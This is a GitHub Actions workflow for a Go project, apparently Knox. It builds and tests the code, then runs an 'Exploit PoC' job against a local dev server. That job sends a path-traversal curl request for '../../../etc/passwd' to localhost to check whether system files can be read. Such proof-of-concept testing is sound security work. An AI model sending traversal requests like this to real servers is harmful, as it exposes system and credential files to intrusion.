name: Go

permissions: read-all

on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]

jobs:
  build:
    name: Build and Test
    runs-on: ubuntu-latest
    steps:
      - name: Set up Go 1.x
        uses: actions/setup-go@v2
        with:
          go-version: ^1.14.6

      - name: Checkout
        uses: actions/checkout@v2

      - name: Build
        run: go build -v ./...

      - name: Test
        run: go test -v ./...

      - name: Fmt
        run: diff -u <(echo -n) <(gofmt -d -s .)

      - name: Vet
        run: go vet ./...

  exploit_poc:
    name: Exploit PoC
    runs-on: ubuntu-latest
    needs: build
    steps:
      - name: Checkout
        uses: actions/checkout@v2

      - name: Set up Go 1.x
        uses: actions/setup-go@v2
        with:
          go-version: ^1.24

      - name: Start Knox server in background
        run: |
          go run ./cmd/dev_server > knox_server.log 2>&1 &
          echo $! > server.pid
          sleep 15
          cat knox_server.log

      - name: Check if port 8080 is listening
        run: netstat -tulnp | grep 8080 || true

      - name: Run curl tests
        run: |
          curl -v http://localhost:8080/normal/path || true
          curl -v http://localhost:8080/../../../etc/passwd || true

      - name: Stop Knox server
        run: kill $(cat server.pid) || true

      - name: Show Knox logs again
        run: cat knox_server.log

      - name: Upload Knox server logs as artifact
        uses: actions/upload-artifact@v4
        with:
          name: knox_server_logs
          path: knox_server.log
